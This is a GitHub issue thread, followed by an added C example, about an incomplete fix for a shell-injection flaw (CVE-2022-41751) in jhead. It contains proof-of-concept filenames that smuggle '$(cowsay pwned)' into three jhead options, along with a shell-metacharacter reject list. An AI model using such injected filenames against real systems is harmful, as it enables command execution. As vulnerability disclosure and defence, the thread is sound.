
Incomplete fix for CVE-2022-41751

Open jwilk opened this issue 3 years ago • 1 comments

Cc: @kyle-tenet3

#57 did not fix the shell injection.

Proof of concept:

$ cp tests/expected-bin/thumb-inserted.jpg 'moo$(cowsay pwned).jpeg'
$ jhead -rgt50 moo*.jpeg
mogrify-im6.q16: unable to open image `moo _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||.jpeg': No such file or directory @ error/blob.c/OpenBlob/2874.

Error : Unable to run 'mogrify' command
in file 'moo$(cowsay pwned).jpeg'

jwilk, Oct 19 '22 08:10

The -autorot option is vulnerable too:

$ rm -f moo*.jpeg
$ cp tests/normal-digicams/rotate.jpg 'moo$(cowsay pwned).jpeg' 
$ jhead -autorot moo*.jpeg
jpegtran: can't open moo _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||.jpeg.thi for reading
Modified: moo$(cowsay pwned).jpeg

So is the -ce option:

$ rm -f moo*.jpeg
$ cp tests/normal-digicams/rotate.jpg 'moo$(cowsay pwned >&2 | sleep 99).jpeg'
$ jhead -ce moo*.jpeg
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

jwilk, Oct 19 '22 09:10

Fixed by ec67262b8e5a4b05d8ad6898a09f1dc3fc032062

Matthias-Wandel, Oct 22 '22 12:10

It would be great to tag a new release.

ffontaine, Nov 12 '22 21:11

I prefer to do that after I find time to look at the open issues


Matthias-Wandel, Nov 12 '22 21:11

Tried reproducing your "vulnerabilities". The output I get is: Nonfatal Error : 'moo$(cowsay pwned).jpeg' Filename has invalid characters.

No attempt at trying to execute some file. Plus, this so-called vulnerability is only if you give it parameters on the command line to execute that file, I think. Doesn't really matter, because as far as I can tell, this doesn't work, at least your demonstration doesn't work.

Matthias-Wandel, Jun 06 '23 13:06

Tried reproducing your "vulnerabilities".

@Matthias-Wandel, I believe the vulnerability was only reproducible until you patched it in October.

These types of command line vulnerabilities are serious, since servers using jhead might read filenames which are controlled by a user/attacker.

eslerm, Jun 06 '23 20:06
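All three reports above share one root cause: a filename the user controls is spliced into a command string that /bin/sh then parses, so `$(...)` in the name runs as a command. The C below is an added example, not jhead's code, showing that vulnerable construction next to the fix a defender expects (an argv array handed to execvp, so no shell ever sees the name) plus a reject-list check in the spirit of the "Filename has invalid characters" message the maintainer quotes; the tool name, the `-rotate 90` option and the metacharacter list are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (illustrative, not jhead's code): the filename is spliced
 * into a shell command line, so $( ), backticks, ; and | inside it are
 * interpreted by /bin/sh once the string reaches system(). Built here only,
 * never executed. */
int build_shell_command(char *out, size_t outlen, const char *tool,
                        const char *filename)
{
    return snprintf(out, outlen, "%s -rotate 90 '%s'", tool, filename);
}

/* Defence in depth: refuse names containing shell metacharacters before they
 * reach any external command. The character list is an assumption. */
int has_shell_metachar(const char *filename)
{
    return strpbrk(filename, "$`;|&<>()\"'\\\n") != NULL;
}

/* Hardened pattern: fork + execvp with an argv array. Each element arrives in
 * the child as exactly one argument and no shell is involved. Returns the
 * child's exit status, or -1 if it could not be spawned or did not exit. */
int run_tool_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127); /* exec failed; 127 mirrors the shell's convention */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What the rotation call should look like: tool and option are assumed
 * placeholders; the filename is passed literally as its own argument. */
int rotate_with_tool(const char *tool, const char *filename)
{
    if (has_shell_metachar(filename))
        return -2; /* refuse, as an invalid-character check would */
    char *argv[] = { (char *)tool, "-rotate", "90", (char *)filename, NULL };
    return run_tool_argv(argv);
}
```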